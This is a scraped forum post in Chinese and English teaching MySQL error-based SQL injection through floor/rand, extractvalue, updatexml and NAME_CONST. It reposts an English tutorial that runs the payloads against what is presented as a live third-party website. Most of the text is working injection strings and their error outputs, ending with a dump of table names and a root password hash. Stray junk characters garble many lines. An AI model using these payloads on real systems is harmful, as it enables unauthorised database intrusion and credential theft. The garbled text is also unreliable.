|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
6 D& e7 t" W1 I c6 [# X首先进行正常查询: mysql> select * from article where id = 1;8 Z& |! c. P( p' w- l1 F
+—-+——-+———+
- J7 @- Z4 @$ b| id | title | content |) f# L/ z! M0 I
+—-+——-+———+6 n5 t! q6 H) J( \0 B8 w* L; R. w
| 1 | test | do it |
: H5 ` ^0 O$ C) }+ F+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
; q6 Y7 Z' _9 E# x) F. XERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 n7 r- q" O; o- `$ M
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);" U3 }; W, v# X0 U8 x: h
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
- n" i# }8 L# @ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue; ?+ p# [8 R" L, T6 s. s3 l
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–' K5 @' Z; e; {6 e" Z
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ ! e$ f" O+ N( a! m
7 b; B5 P3 W: f1 X再收集:
; l4 } \/ r2 k# q" e5 e4 ?1 m& Shttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ) S3 f5 Q. `# l3 p: U7 [
2 I! ~- S# R1 q5 g5 s8 jError uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’/ D3 q/ h1 t8 Q3 c: L# o# A6 S. i
2 M6 p Z7 Y+ V; S9 C5 J5 W* Z/ g
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)7 ]- l( |, n8 Y0 r( R0 Q7 m# W
- \9 f. G& F, W+ d) fError uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ $ l% g$ x7 [$ d" k# T5 V
- e& ?( j9 W/ p/ ~4 ^6 t m
MYSQL高版本报错注入技巧-利用NAME_CONST注入
: i0 u6 Y3 w6 e% s/ sIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
* J2 |8 V; s5 f' f
9 i; X4 Z1 p9 a# n+ _4 b% }, W/ ?( i. D1 ?: m U) h" v4 S2 x
相关信息
7 j( q3 |9 ~' h" _1 E0 Z* A/ d
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.9 ~5 Z8 x% _ y. S" A
' h8 ~7 v- _. H
Code:: _$ w/ D% B- b( j) B, [4 [
NAME_CONST(DATA, VALUE)
- d4 G: |$ h8 `& Q6 F+ g) |3 c2 Y- X' M( H1 r7 U
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
9 A* I/ @' N: m: N. A9 J6 A2 i4 V6 O8 S
SELECT NAME_CONST('TEST', 1)
9 j" T# U7 H9 G( Z; S; X
# C% h$ f8 h1 N8 W+ z* O
& H1 f1 \# {8 } e4 Z$ ?2 y# L6 h
$ b# O' @: r. }: e7 s|---------------|' \0 a, k& D1 j+ ]5 u
| TEST |4 a5 v: k7 W& t* t: v; d, l9 D- F
| |8 [( M8 ~" J, l* e% r K5 t0 {
|---------------|5 v3 P% k! [3 Y4 I- x
| 1 |
% B/ X/ d& e2 J; T2 Y5 U| |8 [0 F6 U" u+ c% ~6 z9 r3 |
|---------------|
! c! ], d7 \0 ]: w$ W6 S' `1 Y3 Q0 H, Y( v6 l* D1 A1 D/ X- S1 G+ p! P
7 _6 Q0 Z- a; g' s3 E9 _. }" o0 A1 o* q* ?9 o# W. r$ d/ X8 j
" ^. z V% k6 Z8 B! dhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const) M4 [5 @, g5 Z# k7 a O
Intro to MySQL Variables
! B- J) C: X8 l" G0 |5 q+ v' z
: J& C/ \! D4 | jOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
% z, z: u2 R9 B
: ~# z' a- U8 f2 E+ ]Code:$ a- K$ o4 x/ v7 m: _1 @
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
m- S0 _. e, H) x! c
1 w; e/ ?+ m' Y8 N B; d l$ ]( a- P U# ^) h
# _! J+ T% ^; f! J# _" D& q+ ^
+ y3 J9 X2 F8 V
; a2 Q" | K0 Y, Q5 t# }7 z6 l# ?$ h
Code:' m9 x( h. n, f: s& U% l) g+ ]
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
- P! c% l. v! h, v% m6 b Y
* ?4 V) R% O+ P; i! S( O$ m' M+ m6 k. M) Z) |$ m/ N# G
VAR = Your MySQL variable.+ k( Q& P. O4 m8 C) L5 |
" V# | w& t; T+ {( JMySQL 5.1.3 Server System Variables
: [& U6 u8 X/ \+ J0 K: N9 d2 `
& f* X, T2 R' w$ R7 z O L2 uLet's try it out on my site..0 f+ A" n; l: T! f0 ]
* Y8 F3 J3 J) Z3 n# g9 \. D" ]' U
Code:, D+ M) S; G) a) e
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--* V) w+ c1 v9 Y9 M; `2 Z
7 o y9 ~: K1 d% l
Error uplicate column name '5.0.27-community-nt'! B# L# x6 f5 `* V
% F- ?1 ?$ U, i% r4 `2 {2 L) y
b8 O& K, [- A o% o; [8 K% X& B8 _( _3 l7 C8 Y4 d. o/ t u
) x. t% A3 I8 `. r4 ~' U
2 |* [8 |* e( T3 v3 j8 uNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
' [& W" E, _2 g9 n$ s/ R: |# `7 P8 W" W, b+ b* ]/ k
Data Extraction
* F8 m0 `; V; E+ R U3 X6 d: v! P2 n0 M. U$ c, T! _
Code: y! t& O( `* ^9 X" R. q g) \6 N& v" u
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--- p; J& t' q1 O8 J& ]; f
* Q3 Y" V, ]4 g/ _& N: \6 t
% I- w1 N; h6 O: e k4 lWe should get a duplicate column 1 error.... B m! \% U2 S* Y7 C$ ^. |7 A' P
5 ^. y" S. U- c7 B! t; R7 B
Code:( Y% n7 S8 d, m4 C7 t
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--- i3 a: q7 C0 C# W4 \1 a7 B' y
7 Y4 n" G" S Y6 ~/ L
Error uplicate column name '1. \- S1 Z* F6 y1 v
7 C+ h2 R4 e: j5 F
* b% j R# Q Z- H& }
% F0 m- R9 G9 D0 }
5 p, ~8 M: m# W
% `" k9 n7 ?# `
/ p0 U B' Q9 w3 ?Now let's get the tables out this bitch..0 l. @4 N8 T* q
7 L5 e( h# m0 D3 I' }; s
Code:
; y: T: E2 c, U+ f+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
" |$ `7 B* g$ d0 G5 ~ N
7 |8 U0 r+ ^$ j9 Z* }
7 D z/ D7 d7 B/ X% sLet's see if it works here, if it does, we can go on and finish the job.
7 Z, t' c4 c" ~: h! s
5 ]. k; M2 b; {& j/ E! F! `Code:
' W7 j- x5 ~4 V" ^http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
: L. ]+ V" E& D0 T# r
$ D( g5 H! Y. {1 k z) j3 a$ r( y4 _7 |, [+ h
Error uplicate column name 'com_admanage
, _7 ~7 q7 ]( t# ^
& M% @- e0 C. |, k3 C
0 }8 N# O/ Y0 l8 {8 e1 Y1 G% f( { B" j+ F% I+ Q1 D
% U# N5 m: z2 [) ~, W; H3 I! h1 l! e- ] g" _ S$ f W
+ Z$ q* J5 T. M& `: iNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.$ x. I; c; }: h2 X
7 ~9 ~" b5 ^* z0 v; y# B: X$ V* ], D
Let's get the columns out of the user table..; A) }$ S& K' }6 Q: w' i
D% k6 ~7 ^. o
Code:; c* y; u- C; @7 c
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
6 x, W% p8 f! f" B0 P1 X3 g
' K% T; [2 N* a
5 s4 H! {3 }+ y; _So mine looks like this, and I get the duplicate column name 'Host'./ ~' _9 A" Y& o" J7 T; F
/ N! m) \/ s* z3 T. Z( B2 Z
Code:5 r7 }0 F4 ~. _$ d4 I& S5 n
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
3 h# z% I4 P+ L @& Z3 M
8 o. z! o* f& u1 n) qError uplicate column name 'Host'. y7 X6 \$ k& f) C) l2 H/ l
1 c$ B7 R4 \+ U7 s4 G) I: {# V" ?( u* V
5 m: E; V# a! Q* {# X0 O+ z$ c* `0 a+ n* u
) L- F$ I6 {! w. W4 Q: S7 s, r
- W" V1 t- C+ ]& h) GWoot, time to finish this bitch off.8 B$ l% s: c1 A# q6 h
8 A, @4 J, S2 V# g6 lCode:
3 N$ o8 l: T4 } v+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--3 J( \( E' }9 x" J
; R" q/ b* b" M* C2 N( g" ~& q5 `
- p5 L- _' X0 L4 `7 w. u
So mine looks like this...( e w+ d8 Z5 ~2 K4 S
H# M2 e6 r& }8 P
Code:3 y* t- Y, q+ D$ E& `- o( }: n% W
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
$ G: \0 i S2 }& O) H7 A8 `9 Q
( U5 O7 ^. D2 F0 UError uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
" _: l' l. _4 P9 A/ P! b4 L0 p) L9 I7 }+ j( t' ~9 P) K
4 N' _; ]. \8 Z! n
. A( r& p# m2 h! k. o8 P+ o* y
- u, O: e) N, o
! u: x* t: G H Q; S# ^& Q9 X# J/ w" S
And there we have it, thanks for reading.( z L* a- q& X+ @
; L' D9 ?; |2 G' d' F" A
|